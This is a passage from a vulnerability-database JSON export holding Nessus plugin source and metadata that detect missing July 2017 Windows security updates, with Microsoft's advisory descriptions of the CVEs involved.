\"CVE-2017-8592\",\n \"CVE-2017-8595\",\n \"CVE-2017-8599\",\n \"CVE-2017-8601\",\n \"CVE-2017-8602\",\n \"CVE-2017-8605\",\n \"CVE-2017-8606\",\n \"CVE-2017-8607\",\n \"CVE-2017-8608\",\n \"CVE-2017-8609\",\n \"CVE-2017-8611\",\n \"CVE-2017-8618\",\n \"CVE-2017-8619\"\n );\n script_bugtraq_id(\n 99387,\n 99388,\n 99389,\n 99390,\n 99391,\n 99392,\n 99393,\n 99394,\n 99396,\n 99397,\n 99398,\n 99399,\n 99400,\n 99402,\n 99403,\n 99408,\n 99409,\n 99410,\n 99412,\n 99413,\n 99414,\n 99416,\n 99418,\n 99419,\n 99420,\n 99421,\n 99423,\n 99424,\n 99425,\n 99426,\n 99427,\n 99428,\n 99429,\n 99431,\n 99432,\n 99439\n );\n script_xref(name:\"MSKB\", value:\"4025338\");\n script_xref(name:\"MSFT\", value:\"MS17-4025338\");\n\n script_name(english:\"KB4025338: Windows 10 July 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4025338.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Windows Search handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-8589)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine, when rendered in Internet\n Explorer, handles objects in memory. In a web-based\n attack scenario, an attacker could host a specially\n crafted website that is designed to exploit this\n vulnerability through Internet Explorer and then\n convince a user to view the website. An attacker could\n also embed an ActiveX control marked "safe for\n initialization in an application or Microsoft\n Office document that hosts the Internet Explorer\n rendering engine. The attacker could also take advantage\n of compromised websites and websites that accept or host\n user-provided content or advertisements. These websites\n could contain specially crafted content that could\n exploit this vulnerability. An attacker who successfully\n exploited this vulnerability could gain the same user\n rights as the current user. (CVE-2017-8618)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8467, CVE-2017-8556,\n CVE-2017-8573, CVE-2017-8577, CVE-2017-8578,\n CVE-2017-8580)\n\n - A Denial Of Service vulnerability exists when Windows\n Explorer attempts to open a non-existent file. An\n attacker who successfully exploited this vulnerability\n could cause a denial of service. A attacker could\n exploit this vulnerability by hosting a specially\n crafted web site and convince a user to browse to the\n page, containing the reference to the non-existing file,\n and cause the victim's system to stop responding. An\n attacker could not force a user to view the attacker-\n controlled content. Instead, an attacker would have to\n convince a user to take action. For example, an attacker\n could trick a user into clicking a link that takes the\n user to the attacker's site The update addresses the\n vulnerability by correcting how Windows Explorer handles\n open attempts for non-existent files. (CVE-2017-8587)\n\n - A remote code execution vulnerability exists in the way\n JavaScript engines render when handling objects in\n memory in Microsoft browsers. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2017-8606, CVE-2017-8607,\n CVE-2017-8608)\n\n - A security feature bypass vulnerability exists in\n Microsoft Windows when Kerberos fails to prevent\n tampering with the SNAME field during ticket exchange.\n An attacker who successfully exploited this\n vulnerability could use it to bypass Extended Protection\n for Authentication. (CVE-2017-8495)\n\n - A remote code execution vulnerability exists in the way\n that the Scripting Engine renders when handling objects\n in memory in Microsoft browsers. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8609)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2017-8561)\n\n - A remote code execution vulnerability exists in\n PowerShell when PSObject wraps a CIM Instance. An\n attacker who successfully exploited this vulnerability\n could execute malicious code on a vulnerable system. In\n an attack scenario, an attacker could execute malicious\n code in a PowerShell remote session. The update\n addresses the vulnerability by correcting how PowerShell\n deserializes user supplied scripts. (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8562)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows when Win32k fails to properly handle\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8486)\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console when it improperly\n parses XML input containing a reference to an external\n entity. An attacker who successfully exploited this\n vulnerability could read arbitrary files via an XML\n external entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8595, CVE-2017-8605,\n CVE-2017-8619)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. (CVE-2017-8590)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8564)\n\n - A security feature bypass vulnerability exists when\n Microsoft Browsers improperly handle redirect requests.\n This vulnerability allows Microsoft Browsers to bypass\n CORS redirect restrictions and to follow redirect\n requests that should otherwise be ignored. An attacker\n who successfully exploited this vulnerability could\n force the browser to send data that would otherwise be\n restricted to a destination web site of their choice.\n (CVE-2017-8592)\n\n - An Information Disclosure vulnerability exists when the\n HTTP.sys server application component improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the HTTP.sys server application\n system. A remote unauthenticated attacker could exploit\n this vulnerability by issuing a request to the HTTP.sys\n server application. The update addresses the\n vulnerability by correcting how the HTTP.sys server\n application handles objects in memory. (CVE-2017-8582)\n\n - A spoofing vulnerability exists when an affected\n Microsoft browser does not properly parse HTTP content.\n An attacker who successfully exploited this\n vulnerability could trick a user by redirecting the user\n to a specially crafted website. The specially crafted\n website could either spoof content or serve as a pivot\n to chain an attack with other vulnerabilities in web\n services. (CVE-2017-8602)\n\n - A denial of service vulnerability exists when Microsoft\n Common Object Runtime Library improperly handles web\n requests. An attacker who successfully exploited this\n vulnerability could cause a denial of service against a\n .NET web application. A remote unauthenticated attacker\n could exploit this vulnerability by issuing specially\n crafted requests to the .NET application. The update\n addresses the vulnerability by correcting how the .NET\n web application handles web requests. (CVE-2017-8585)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context.\n (CVE-2017-8581)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when a man-in-the-middle attacker is\n able to successfully forward an authentication request\n to a Windows LDAP server, such as a system running\n Active Directory Domain Services (AD DS) or Active\n Directory Lightweight Directory Services (AD LDS), which\n has been configured to require signing or sealing on\n incoming connections. The update addresses this\n vulnerability by incorporating support for Extended\n Protection for Authentication security feature, which\n allows the LDAP server to detect and block such\n forwarded authentication requests once enabled.\n (CVE-2017-8563)\n\n - A spoofing vulnerability exists when Microsoft Edge\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was on a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2017-8611)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge fails to correctly apply Same Origin\n Policy for HTML elements present in other browser\n windows. An attacker could use this vulnerability to\n trick a user into loading a page with malicious content.\n (CVE-2017-8599)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft WordPad parses specially crafted files.\n Exploitation of this vulnerability requires that a user\n open a specially crafted file with an affected version\n of Microsoft WordPad. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists when\n Windows Explorer improperly handles executable files and\n shares during rename operations. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in the context of another user. Users not\n running as administrators would be less affected.\n (CVE-2017-8463)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. In a web-based attack scenario, an attacker could\n host a specially crafted website that is designed to\n exploit the vulnerability through Microsoft browsers and\n then convince a user to view the website. An attacker\n could also embed an ActiveX control marked "safe\n for initialization" in an application or Microsoft\n Office document that hosts the related rendering engine.\n The attacker could also take advantage of compromised\n websites, and websites that accept or host user-provided\n content or advertisements. These websites could contain\n specially crafted content that could exploit the\n vulnerability. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8601)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console when it improperly\n parses XML input containing a reference to an external\n entity. An attacker who successfully exploited this\n vulnerability could read arbitrary files via an XML\n external entity (XXE) declaration. (CVE-2017-8557)\");\n # https://support.microsoft.com/en-us/help/4025338/windows-10-update-kb4025338\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?aa6f9fa1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4025338.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-07\";\nkbs = make_list('4025338');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\nos_name = get_kb_item_or_exit(\"SMB/ProductName\");\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif(\"LTSB\" >!< os_name) audit(AUDIT_OS_NOT, \"Windows 10 version 1507 LTSB\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"07_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4025338])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:44:08", "description": "The remote Windows host is missing multiple security updates. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. (CVE-2017-8463)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Microsoft Graphics component due to improper\n handling of objects in memory. A local attacker can\n exploit these, via a specially crafted application, to\n run arbitrary code in kernel mode. (CVE-2017-8467,\n CVE-2017-8556, CVE-2017-8573, CVE-2017-8577,\n CVE-2017-8578, CVE-2017-8580)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context. (CVE-2017-8563)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A denial of service vulnerability exists in Windows\n Explorer that is triggered when Explorer attempts to\n open a non-existent file. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause a user's system to\n stop responding. (CVE-2017-8587)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. (CVE-2017-8592)\n\n - A remote code execution vulnerability exists in the way \n JavaScript engines render when handling objects in memory \n in Microsoft browsers. The vulnerability could corrupt memory \n in such a way that an attacker could execute arbitrary code \n in the context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user rights as \n the current user. (CVE-2017-8606, CVE-2017-8607, CVE-2017-8608,\n CVE-2017-8618)", "edition": 31, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-11T00:00:00", "title": "Windows 2008 July 2017 Multiple Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8608", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8606", "CVE-2017-8607", "CVE-2017-8565", "CVE-2017-8467", "CVE-2017-8495", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_JUL_WIN2008.NASL", "href": "https://www.tenable.com/plugins/nessus/101374", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101374);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/04/10 16:10:18\");\n\n script_cve_id(\n \"CVE-2017-0170\",\n \"CVE-2017-8463\",\n \"CVE-2017-8467\",\n \"CVE-2017-8486\",\n \"CVE-2017-8495\",\n \"CVE-2017-8556\",\n \"CVE-2017-8557\",\n \"CVE-2017-8563\",\n \"CVE-2017-8564\",\n \"CVE-2017-8565\",\n \"CVE-2017-8573\",\n \"CVE-2017-8577\",\n \"CVE-2017-8578\",\n \"CVE-2017-8580\",\n \"CVE-2017-8581\",\n \"CVE-2017-8582\",\n \"CVE-2017-8587\",\n \"CVE-2017-8588\",\n \"CVE-2017-8589\",\n \"CVE-2017-8590\",\n \"CVE-2017-8592\",\n \"CVE-2017-8606\",\n \"CVE-2017-8607\",\n \"CVE-2017-8608\",\n \"CVE-2017-8618\"\n );\n script_bugtraq_id(\n 99387,\n 99389,\n 99394,\n 99396,\n 99398,\n 99400,\n 99402,\n 99409,\n 99413,\n 99414,\n 99416,\n 99419,\n 99421,\n 99423,\n 99424,\n 99425,\n 99427,\n 99428,\n 99429,\n 99431,\n 99439\n );\n script_xref(name:\"MSKB\", value:\"4022746\");\n script_xref(name:\"MSFT\", value:\"MS17-4022746\");\n script_xref(name:\"MSKB\", value:\"4022748\");\n script_xref(name:\"MSFT\", value:\"MS17-4022748\");\n script_xref(name:\"MSKB\", value:\"4022914\");\n script_xref(name:\"MSFT\", value:\"MS17-4022914\");\n script_xref(name:\"MSKB\", value:\"4025240\");\n script_xref(name:\"MSFT\", value:\"MS17-4025240\");\n script_xref(name:\"MSKB\", value:\"4025252\");\n script_xref(name:\"MSFT\", value:\"MS17-4025252\");\n script_xref(name:\"MSKB\", value:\"4025397\");\n script_xref(name:\"MSFT\", value:\"MS17-4025397\");\n script_xref(name:\"MSKB\", value:\"4025398\");\n script_xref(name:\"MSFT\", value:\"MS17-4025398\");\n script_xref(name:\"MSKB\", value:\"4025409\");\n script_xref(name:\"MSFT\", value:\"MS17-4025409\");\n script_xref(name:\"MSKB\", value:\"4025497\");\n script_xref(name:\"MSFT\", value:\"MS17-4025497\");\n script_xref(name:\"MSKB\", value:\"4025674\");\n script_xref(name:\"MSFT\", value:\"MS17-4025674\");\n script_xref(name:\"MSKB\", value:\"4025872\");\n script_xref(name:\"MSFT\", value:\"MS17-4025872\");\n script_xref(name:\"MSKB\", value:\"4025877\");\n script_xref(name:\"MSFT\", value:\"MS17-4025877\");\n script_xref(name:\"MSKB\", value:\"4026059\");\n script_xref(name:\"MSFT\", value:\"MS17-4026059\");\n script_xref(name:\"MSKB\", value:\"4026061\");\n script_xref(name:\"MSFT\", value:\"MS17-4026061\");\n script_xref(name:\"MSKB\", value:\"4032955\");\n script_xref(name:\"MSFT\", value:\"MS17-4032955\");\n\n script_name(english:\"Windows 2008 July 2017 Multiple Security Updates\");\n script_summary(english:\"Checks the existence of Windows Server 2008 July 2017 Patches.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing multiple security updates. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. (CVE-2017-8463)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Microsoft Graphics component due to improper\n handling of objects in memory. A local attacker can\n exploit these, via a specially crafted application, to\n run arbitrary code in kernel mode. (CVE-2017-8467,\n CVE-2017-8556, CVE-2017-8573, CVE-2017-8577,\n CVE-2017-8578, CVE-2017-8580)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context. (CVE-2017-8563)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A denial of service vulnerability exists in Windows\n Explorer that is triggered when Explorer attempts to\n open a non-existent file. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause a user's system to\n stop responding. (CVE-2017-8587)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. (CVE-2017-8592)\n\n - A remote code execution vulnerability exists in the way \n JavaScript engines render when handling objects in memory \n in Microsoft browsers. The vulnerability could corrupt memory \n in such a way that an attacker could execute arbitrary code \n in the context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user rights as \n the current user. (CVE-2017-8606, CVE-2017-8607, CVE-2017-8608,\n CVE-2017-8618)\");\n # https://support.microsoft.com/en-us/help/4022746/security-update-for-kerberos-sname-security-feature-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?87cdb7f6\");\n # https://support.microsoft.com/en-us/help/4022748/windows-kernel-information-disclosure-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e0e35b15\");\n # https://support.microsoft.com/en-us/help/4022914/windows-kernel-information-disclosure-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1336095c\");\n # https://support.microsoft.com/en-us/help/4025240/microsoft-browser-security-feature-bypass-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9d0d50a8\");\n # https://support.microsoft.com/en-ca/help/4025252/cumulative-security-update-for-internet-explorer-july-11-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59926d5e\");\n # https://support.microsoft.com/en-us/help/4025397/windows-performance-monitor-information-disclosure-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9381ee94\");\n # https://support.microsoft.com/en-us/help/4025398/security-update-for-msinfo-exe-information-disclosure-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2683f326\");\n # https://support.microsoft.com/en-us/help/4025409/security-update-for-the-windows-elevation-of-privilege-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?423780d0\");\n # https://support.microsoft.com/en-us/help/4025497/windows-explorer-remote-code-execution-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?626af1da\");\n # https://support.microsoft.com/en-us/help/4025674/windows-explorer-denial-of-service-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bf02f1f7\");\n # https://support.microsoft.com/en-us/help/4025872/windows-powershell-remote-code-execution-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f364ec16\");\n # https://support.microsoft.com/en-us/help/4025877/security-update-for-windows-server-2008-july-11-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?548d2827\");\n # https://support.microsoft.com/en-us/help/4026059/windows-clfs-elevation-of-privilege-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?628791cd\");\n # https://support.microsoft.com/en-us/help/4026061/security-update-for-the-wordpad-remote-code-execution-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ff6e3fd2\");\n # https://support.microsoft.com/en-us/help/4032955/windows-search-remote-code-execution-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?54a9e296\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the following security updates :\n\n - 4022746\n - 4022748\n - 4022914\n - 4025240\n - 4025252\n - 4025397\n - 4025398\n - 4025409\n - 4025497\n - 4025674\n - 4025872\n - 4025877\n - 4026059\n - 4026061\n - 4032955\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n 